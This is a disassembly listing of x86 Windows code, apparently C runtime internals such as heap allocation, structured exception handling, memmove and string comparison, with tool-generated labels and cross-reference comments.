loc_42B38A: ; CODE XREF: sub_42B2F0+57�j
dec edi
jnz short loc_42B394
neg edx
neg eax
sbb edx, 0
loc_42B394: ; CODE XREF: sub_42B2F0+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_42B2F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B39A proc near ; CODE XREF: sub_415506+5�p
; sub_418AD3+19C�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0042B43C SIZE 0000007B BYTES
; FUNCTION CHUNK AT 0042B4C5 SIZE 00000012 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437460
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
imul esi, [ebp+arg_4]
mov [ebp+arg_4], esi
mov [ebp+var_1C], esi
cmp esi, 0FFFFFFE0h
ja short loc_42B3E3
xor ebx, ebx
cmp esi, ebx
jnz short loc_42B3D8
push 1
pop esi
loc_42B3D8: ; CODE XREF: sub_42B39A+39�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
jmp short loc_42B3E5
; ---------------------------------------------------------------------------
loc_42B3E3: ; CODE XREF: sub_42B39A+33�j
xor ebx, ebx
loc_42B3E5: ; CODE XREF: sub_42B39A+47�j
; sub_42B39A+115�j
mov [ebp+var_20], ebx
cmp esi, 0FFFFFFE0h
ja loc_42B499
mov eax, dword_677004
cmp eax, 3
jnz short loc_42B43C
mov edi, [ebp+var_1C]
cmp edi, dword_676FFC
ja short loc_42B482
push 9
call sub_42DAEF
pop ecx
mov [ebp+var_4], ebx
push edi
call sub_42CC4E
pop ecx
mov [ebp+var_20], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_42B433
cmp [ebp+var_20], ebx
jz short loc_42B487
push [ebp+var_1C]
jmp short loc_42B476
sub_42B39A endp
; =============== S U B R O U T I N E =======================================
sub_42B42E proc near ; DATA XREF: .text:00437468�o
xor ebx, ebx
mov esi, [ebp+0Ch]
sub_42B42E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42B433 proc near ; CODE XREF: sub_42B39A+85�p
push 9
call sub_42DB50
pop ecx
retn
sub_42B433 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B39A
loc_42B43C: ; CODE XREF: sub_42B39A+5F�j
cmp eax, 2
jnz short loc_42B482
cmp esi, dword_453174
ja short loc_42B482
push 9
call sub_42DAEF
pop ecx
mov [ebp+var_4], 1
mov eax, esi
shr eax, 4
push eax
call sub_42D6F1
pop ecx
mov [ebp+var_20], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_42B4BC
cmp [ebp+var_20], ebx
jz short loc_42B487
push esi
loc_42B476: ; CODE XREF: sub_42B39A+92�j
push ebx
push [ebp+var_20]
call sub_429760
add esp, 0Ch
loc_42B482: ; CODE XREF: sub_42B39A+6A�j
; sub_42B39A+A5�j ...
cmp [ebp+var_20], ebx
jnz short loc_42B4C5
loc_42B487: ; CODE XREF: sub_42B39A+8D�j
; sub_42B39A+D9�j
push esi
push 8
push dword_677000
call dword_437210 ; RtlAllocateHeap
mov [ebp+var_20], eax
loc_42B499: ; CODE XREF: sub_42B39A+51�j
cmp [ebp+var_20], ebx
jnz short loc_42B4C5
cmp dword_676930, ebx
jz short loc_42B4C5
push esi
call sub_42C6C5
pop ecx
test eax, eax
jnz loc_42B3E5
jmp short loc_42B4C8
; END OF FUNCTION CHUNK FOR sub_42B39A
; =============== S U B R O U T I N E =======================================
sub_42B4B7 proc near ; DATA XREF: .text:00437474�o
xor ebx, ebx
mov esi, [ebp+0Ch]
sub_42B4B7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42B4BC proc near ; CODE XREF: sub_42B39A+D1�p
push 9
call sub_42DB50
pop ecx
retn
sub_42B4BC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B39A
loc_42B4C5: ; CODE XREF: sub_42B39A+EB�j
; sub_42B39A+102�j ...
mov eax, [ebp+var_20]
loc_42B4C8: ; CODE XREF: sub_42B39A+11B�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_42B39A
; =============== S U B R O U T I N E =======================================
sub_42B4D7 proc near ; CODE XREF: sub_4155AA+F�p
; sub_4155AA+30�p ...
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_4297CA
pop ecx
pop ecx
retn
sub_42B4D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B4E5 proc near ; CODE XREF: sub_431769+71�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_42B4E5 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_42B519 proc near ; CODE XREF: sub_431929+199�p
; sub_431AED+3E�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_42B519 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42B520 proc near ; CODE XREF: sub_431929+17F�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_42B520 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B527 proc near ; CODE XREF: sub_42B6DB+5C�p
; sub_431769:loc_43179A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov eax, large fs:0
mov [ebp+var_8], eax
mov [ebp+var_4], offset loc_42B54F
push 0
push [ebp+arg_4]
push [ebp+var_4]
push [ebp+arg_0]
call sub_436300 ; RtlUnwind
loc_42B54F: ; DATA XREF: sub_42B527+11�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and al, 0FDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, large fs:0
mov ebx, [ebp+var_8]
mov [ebx], eax
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_42B527 endp
; ---------------------------------------------------------------------------
loc_42B576: ; CODE XREF: .text:00436317�j
; .text:00436329�j ...
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_431360
add esp, 20h
mov [ebp+14h], eax
pop edi
pop esi
pop ebx
mov eax, [ebp+14h]
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B5AC proc near ; CODE XREF: sub_4317E4+7B�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
mov [ebp+var_10], offset sub_42B600
inc eax
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_431B80
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_42B5AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B600 proc near ; DATA XREF: sub_42B5AC+16�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cld
mov eax, [ebp+arg_4]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_431360
add esp, 20h
pop ebp
retn
sub_42B600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B625 proc near ; CODE XREF: sub_4315AE+27�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_42B6DB
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_42B6AD
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call sub_42E4EE
call dword ptr [eax+68h]
pop ecx
pop ecx
and [ebp+var_34], 0
loc_42B6AD: ; DATA XREF: sub_42B625+3C�o
cmp [ebp+var_4], 0
jz short loc_42B6CA
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_42B6D3
; ---------------------------------------------------------------------------
loc_42B6CA: ; CODE XREF: sub_42B625+8C�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_42B6D3: ; CODE XREF: sub_42B625+A3�j
mov eax, [ebp+var_34]
pop edi
pop esi
pop ebx
leave
retn
sub_42B625 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B6DB proc near ; DATA XREF: sub_42B625+D�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_42B6FE
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
push 1
pop eax
jmp short loc_42B74B
; ---------------------------------------------------------------------------
loc_42B6FE: ; CODE XREF: sub_42B6DB+12�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_431360
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_42B73C
push [ebp+arg_0]
push [ebp+arg_4]
call sub_42B527
loc_42B73C: ; CODE XREF: sub_42B6DB+54�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
push 1
pop eax
loc_42B74B: ; CODE XREF: sub_42B6DB+21�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42B6DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B750 proc near ; CODE XREF: sub_4313FB+D2�p
; sub_4315AE+45�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
cmp [ebp+arg_4], 0
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+arg_0], esi
mov [ebp+var_4], eax
jl short loc_42B7A7
loc_42B76E: ; CODE XREF: sub_42B750+52�j
cmp esi, 0FFFFFFFFh
jnz short loc_42B778
call sub_431C2D
loc_42B778: ; CODE XREF: sub_42B750+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
cmp [ebx+eax*4+4], ecx
lea eax, [ebx+eax*4]
jge short loc_42B78D
cmp ecx, [eax+8]
jle short loc_42B792
loc_42B78D: ; CODE XREF: sub_42B750+36�j
cmp esi, 0FFFFFFFFh
jnz short loc_42B79E
loc_42B792: ; CODE XREF: sub_42B750+3B�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_42B79E: ; CODE XREF: sub_42B750+40�j
cmp [ebp+arg_4], 0
jge short loc_42B76E
mov eax, [ebp+var_4]
loc_42B7A7: ; CODE XREF: sub_42B750+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_42B7BB
cmp esi, eax
jbe short loc_42B7C0
loc_42B7BB: ; CODE XREF: sub_42B750+65�j
call sub_431C2D
loc_42B7C0: ; CODE XREF: sub_42B750+69�j
lea eax, [esi+esi*4]
pop edi
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_42B750 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_42B7CC proc near ; CODE XREF: sub_4155AA+5�p
; sub_41985D+5�p ...
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_42B7CC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42B7EB proc near ; CODE XREF: sub_42B869+4�p
arg_0 = dword ptr 4
push esi
call sub_430BFB
push dword_676ED4
call sub_431FB2
mov edx, dword_676ED4
pop ecx
mov ecx, dword_676ED0
mov esi, ecx
sub esi, edx
add esi, 4
cmp eax, esi
jnb short loc_42B851
push edx
call sub_431FB2
add eax, 10h
push eax
push dword_676ED4
call sub_431C83
add esp, 0Ch
test eax, eax
jnz short loc_42B834
xor esi, esi
jmp short loc_42B860
; ---------------------------------------------------------------------------
loc_42B834: ; CODE XREF: sub_42B7EB+43�j
mov ecx, dword_676ED0
sub ecx, dword_676ED4
mov dword_676ED4, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov dword_676ED0, ecx
loc_42B851: ; CODE XREF: sub_42B7EB+27�j
mov eax, [esp+4+arg_0]
mov [ecx], eax
add dword_676ED0, 4
mov esi, eax
loc_42B860: ; CODE XREF: sub_42B7EB+47�j
call sub_430C04
mov eax, esi
pop esi
retn
sub_42B7EB endp
; =============== S U B R O U T I N E =======================================
sub_42B869 proc near ; CODE XREF: sub_418D66+19�p
; sub_429247+5�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_42B7EB
neg eax
sbb eax, eax
pop ecx
neg eax
dec eax
retn
sub_42B869 endp
; =============== S U B R O U T I N E =======================================
sub_42B87B proc near ; DATA XREF: .text:0043A018�o
push 80h
call sub_4297B8
test eax, eax
pop ecx
mov dword_676ED4, eax
jnz short loc_42B89C
push 18h
call sub_42C67C
mov eax, dword_676ED4
pop ecx
loc_42B89C: ; CODE XREF: sub_42B87B+12�j
and dword ptr [eax], 0
mov eax, dword_676ED4
mov dword_676ED0, eax
retn
sub_42B87B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B8AA proc near ; CODE XREF: sub_4197A9+20�p
; sub_41C4E4+20�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push [ebp+arg_C]
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
push [ebp+arg_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
mov [ebp+var_14], 42h
push eax
call sub_42DC7D
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_42B8E8
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_42B8F5
; ---------------------------------------------------------------------------
loc_42B8E8: ; CODE XREF: sub_42B8AA+34�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_42DB65
pop ecx
pop ecx
loc_42B8F5: ; CODE XREF: sub_42B8AA+3C�j
mov eax, esi
pop esi
leave
retn
sub_42B8AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B8FA proc near ; CODE XREF: sub_41B1F5+54�p
; sub_41B2BC+18�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_437478
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call dword_437234 ; RaiseException
pop edi
pop esi
leave
retn 8
sub_42B8FA endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B940 proc near ; CODE XREF: sub_419B11+C8�p
; sub_42C70D+93�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_42B971
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_42B96F
jz short loc_42B971
dec ecx
dec ecx
loc_42B96F: ; CODE XREF: sub_42B940+29�j
not ecx
loc_42B971: ; CODE XREF: sub_42B940+9�j
; sub_42B940+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_42B940 endp
; =============== S U B R O U T I N E =======================================
sub_42B978 proc near ; DATA XREF: .text:off_43749C�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_42BA1B
test [esp+4+arg_0], 1
jz short loc_42B98E
push esi
call sub_4290D0
pop ecx
loc_42B98E: ; CODE XREF: sub_42B978+D�j
mov eax, esi
pop esi
retn 4
sub_42B978 endp
; =============== S U B R O U T I N E =======================================
sub_42B994 proc near ; CODE XREF: sub_41B24F+1F�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_43749C
push dword ptr [edi]
call sub_4293A0
inc eax
push eax
call sub_42B4D7
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_42B9C3
push dword ptr [edi]
push eax
call sub_42A5D0
pop ecx
pop ecx
loc_42B9C3: ; CODE XREF: sub_42B994+23�j
mov dword ptr [esi+8], 1
mov eax, esi
pop edi
pop esi
retn 4
sub_42B994 endp
; =============== S U B R O U T I N E =======================================
sub_42B9D1 proc near ; CODE XREF: sub_41B332+17�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_43749C
mov eax, [edi+8]
test eax, eax
mov [esi+8], eax
jz short loc_42BA0E
push dword ptr [edi+4]
call sub_4293A0
inc eax
push eax
call sub_42B4D7
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_42BA14
push dword ptr [edi+4]
push eax
call sub_42A5D0
pop ecx
pop ecx
jmp short loc_42BA14
; ---------------------------------------------------------------------------
loc_42BA0E: ; CODE XREF: sub_42B9D1+16�j
mov eax, [edi+4]
mov [esi+4], eax
loc_42BA14: ; CODE XREF: sub_42B9D1+2E�j
; sub_42B9D1+3B�j
mov eax, esi
pop edi
pop esi
retn 4
sub_42B9D1 endp
; =============== S U B R O U T I N E =======================================
sub_42BA1B proc near ; CODE XREF: sub_41B2D9+2B�p
; sub_41B38A+2B�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_43749C
jz short locret_42BA30
push dword ptr [ecx+4]
call sub_4290D0
pop ecx
locret_42BA30: ; CODE XREF: sub_42BA1B+A�j
retn
sub_42BA1B endp
; =============== S U B R O U T I N E =======================================
sub_42BA31 proc near ; DATA XREF: .text:004374A0�o
mov eax, [ecx+4]
test eax, eax
jnz short locret_42BA3D
mov eax, offset aUnknownExcepti ; "Unknown exception"
locret_42BA3D: ; CODE XREF: sub_42BA31+5�j
retn
sub_42BA31 endp
; =============== S U B R O U T I N E =======================================
sub_42BA3E proc near ; CODE XREF: .text:0042BA6A�p
push esi
mov esi, ecx
push 1Bh
mov dword ptr [esi], offset off_4374BC
call sub_42DAEF
mov esi, [esi+4]
pop ecx
test esi, esi
jz short loc_42BA5D
push esi
call sub_4298F2
pop ecx
loc_42BA5D: ; CODE XREF: sub_42BA3E+16�j
push 1Bh
call sub_42DB50
pop ecx
pop esi
retn
sub_42BA3E endp
; ---------------------------------------------------------------------------
loc_42BA67: ; DATA XREF: .text:off_4374BC�o
push esi
mov esi, ecx
call sub_42BA3E
test byte ptr [esp+8], 1
jz short loc_42BA7D
push esi
call sub_4290D0
pop ecx
loc_42BA7D: ; CODE XREF: .text:0042BA74�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42BA90 proc near ; CODE XREF: sub_41B55A+3A�p
; sub_42C925+2EF�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_42BAB0
cmp edi, eax
jb loc_42BC28
loc_42BAB0: ; CODE XREF: sub_42BA90+16�j
test edi, 3
jnz short loc_42BACC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_42BAEC
rep movsd
jmp off_42BBD8[edx*4]
; ---------------------------------------------------------------------------
loc_42BACC: ; CODE XREF: sub_42BA90+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_42BAE4
and eax, 3
add ecx, eax
jmp dword ptr loc_42BAEC+4[eax*4]
; ---------------------------------------------------------------------------
loc_42BAE4: ; CODE XREF: sub_42BA90+46�j
jmp dword ptr loc_42BBE8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_42BAEC: ; CODE XREF: sub_42BA90+31�j
; sub_42BA90+8E�j ...
jmp off_42BB6C[ecx*4]
; ---------------------------------------------------------------------------
db 90h
dd offset loc_42BAFD+3
dd offset loc_42BB2C
; ---------------------------------------------------------------------------
push eax
loc_42BAFD: ; DATA XREF: sub_42BA90+64�o
mov ebx, 0D1230042h
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_42BAEC
rep movsd
jmp off_42BBD8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_42BB2C: ; DATA XREF: sub_42BA90+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_42BAEC
rep movsd
jmp off_42BBD8[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_42BAEC
rep movsd
jmp off_42BBD8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_42BB6C dd offset loc_42BBCF ; DATA XREF: sub_42BA90:loc_42BAEC�r
dd offset loc_42BBBC
dd offset loc_42BBB4
dd offset loc_42BBAC
dd offset loc_42BBA4
dd offset loc_42BB9C
dd offset loc_42BB94
dd offset loc_42BB8C
; ---------------------------------------------------------------------------
loc_42BB8C: ; CODE XREF: sub_42BA90:loc_42BAEC�j
; DATA XREF: sub_42BA90+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_42BB94: ; CODE XREF: sub_42BA90:loc_42BAEC�j
; DATA XREF: sub_42BA90+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_42BB9C: ; CODE XREF: sub_42BA90:loc_42BAEC�j
; DATA XREF: sub_42BA90+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_42BBA4: ; CODE XREF: sub_42BA90:loc_42BAEC�j
; DATA XREF: sub_42BA90+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_42BBAC: ; CODE XREF: sub_42BA90:loc_42BAEC�j
; DATA XREF: sub_42BA90+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_42BBB4: ; CODE XREF: sub_42BA90:loc_42BAEC�j
; DATA XREF: sub_42BA90+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_42BBBC: ; CODE XREF: sub_42BA90:loc_42BAEC�j
; DATA XREF: sub_42BA90+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_42BBCF: ; CODE XREF: sub_42BA90:loc_42BAEC�j
; DATA XREF: sub_42BA90:off_42BB6C�o
jmp off_42BBD8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_42BBD8 dd offset loc_42BBE8 ; DATA XREF: sub_42BA90+35�r
; sub_42BA90+92�r ...
dd offset loc_42BBF0
dd offset loc_42BBFC
dd offset loc_42BC10
; ---------------------------------------------------------------------------
loc_42BBE8: ; CODE XREF: sub_42BA90+35�j
; sub_42BA90+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_42BBF0: ; CODE XREF: sub_42BA90+35�j
; sub_42BA90+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_42BBFC: ; CODE XREF: sub_42BA90+35�j
; sub_42BA90+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_42BC10: ; CODE XREF: sub_42BA90+35�j
; sub_42BA90+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_42BC28: ; CODE XREF: sub_42BA90+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_42BC5C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_42BC50
std
rep movsd
cld
jmp off_42BD70[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_42BC50: ; CODE XREF: sub_42BA90+1B1�j
; sub_42BA90+208�j ...
neg ecx
jmp off_42BD20[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_42BC5C: ; CODE XREF: sub_42BA90+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_42BC74
and eax, 3
sub ecx, eax
jmp dword ptr loc_42BC74+4[eax*4]
; ---------------------------------------------------------------------------
loc_42BC74: ; CODE XREF: sub_42BA90+1D6�j
; DATA XREF: sub_42BA90+1DD�r
jmp off_42BD70[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_42BC84+4
dd offset loc_42BCA8
; ---------------------------------------------------------------------------
loc_42BC84: ; DATA XREF: sub_42BA90+1EC�o
sar byte ptr [edx+eax*2+3468A00h], 1
and edx, ecx
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_42BC50
std
